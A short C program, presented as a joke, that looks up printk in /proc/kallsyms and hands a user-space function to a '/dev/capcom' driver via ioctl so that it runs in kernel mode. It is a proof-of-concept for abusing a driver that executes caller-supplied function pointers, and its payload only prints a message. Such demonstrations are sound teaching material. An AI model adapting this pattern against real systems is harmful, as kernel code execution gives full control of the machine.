/*
* DISCLAIMER: This is a joke. Do not use this on a system you care about.
*/
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
/*
 * Address of the kernel's printk, resolved by main() from /proc/kallsyms.
 * Deliberately named after the kernel symbol it points at. Stays NULL until
 * main() fills it in; run_in_kernel() calls through it without checking.
 */
static void (*printk)(const char*);
/*
 * Callback handed to the driver through ioctl() in main(). It is only
 * meaningful if the driver really invokes it in kernel context; all it does
 * is call the kernel's printk through the pointer main() resolved.
 */
static void run_in_kernel(void) {
    const char *message = "this ran in kernel mode\n";
    printk(message);
}
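/*
 * Resolves the kernel's printk from /proc/kallsyms, then hands run_in_kernel
 * to the /dev/capcom driver via ioctl, which is presumably expected to call
 * it in kernel context. A driver that invokes a caller-supplied function
 * pointer is a kernel-code-execution primitive — that is the whole joke.
 *
 * Returns 0 on success, 1 on any failure, with a diagnostic on stderr.
 * The kallsyms stream and the device descriptor are closed on every path
 * (the original leaked both).
 */
int main(void) {
    FILE *kallsyms = fopen("/proc/kallsyms", "r");
    if (!kallsyms) {
        perror("fopen /proc/kallsyms");
        return 1;
    }

    /*
     * Parse one line at a time: a bare fscanf loop over three fields stops
     * for good at the first record that carries more than three fields,
     * because the leftover field fails the next "%lx". %lx stores through an
     * unsigned long *, so the destination is unsigned (the signed `long` used
     * before was a format/type mismatch).
     */
    char line[512];
    unsigned long address = 0;
    char type[4];
    char symbol[256];
    while (fgets(line, sizeof line, kallsyms)) {
        unsigned long candidate;
        if (sscanf(line, "%lx %3s %255s", &candidate, type, symbol) == 3
            && strcmp("printk", symbol) == 0) {
            address = candidate;
            break;
        }
    }
    fclose(kallsyms);

    /*
     * address stays 0 when the symbol is absent, and also when the kernel
     * shows this reader zeroed addresses (a hardening setting, not a parse
     * error); in both cases there is nothing usable to call.
     */
    if (address == 0) {
        fprintf(stderr, "printk was never found\n");
        return 1;
    }
    printk = (void (*)(const char *)) address;

    int fd = open("/dev/capcom", O_RDONLY);
    if (fd < 0) {
        perror("open /dev/capcom");
        return 1;
    }

    int rc = 0;
    if (ioctl(fd, 0xAA012044, run_in_kernel) < 0) {
        perror("ioctl");
        rc = 1;
    }
    close(fd);
    return rc;
}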